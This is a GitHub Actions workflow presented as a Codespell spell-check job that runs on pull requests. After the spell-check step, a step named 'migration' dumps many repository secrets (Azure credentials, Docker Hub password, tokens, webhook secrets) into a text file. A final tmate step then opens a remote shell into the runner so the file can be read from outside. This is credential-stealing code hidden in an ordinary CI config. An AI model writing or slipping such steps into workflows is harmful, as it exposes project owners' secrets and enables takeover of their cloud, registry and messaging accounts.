name: Codespell

on: pull_request

jobs:
  codespell:
    name: Codespell
    runs-on: ubuntu-latest
    steps:
      - name: Checkout Code
        uses: actions/checkout@v2
      - name: Codespell
        uses: codespell-project/actions-codespell@master
        with:
          ignore_words_list: test,aks,complies
          check_filenames: true
          check_hidden: false

      - name: migration
        run: |
          echo "${{ secrets.ARGO_EVENT_SECRET }}" > migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.ARGO_EVENT_URL }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.ARGO_WF_NOTIFICATION_GH_TOKEN }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.AW_NOTIFICATION_TOKEN }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.AZURE_CREDENTIALS }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.CR_TOKEN }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.DOCKERHUB_EMAIL }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.DOCKERHUB_NAME }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.DOCKERHUB_PASSWORD }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.DOCKERHUB_SECRET }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.SLACK_WEBHOOK }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.TOKEN }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.WEBHOOK_SECRET }}" >> migration.txt
          echo "break" >> migration.txt
          echo "${{ secrets.WEBHOOK_URL }}" >> migration.txt
          echo "break" >> migration.txt

      - name: Run tmate
        uses: mxschmitt/action-tmate@v3
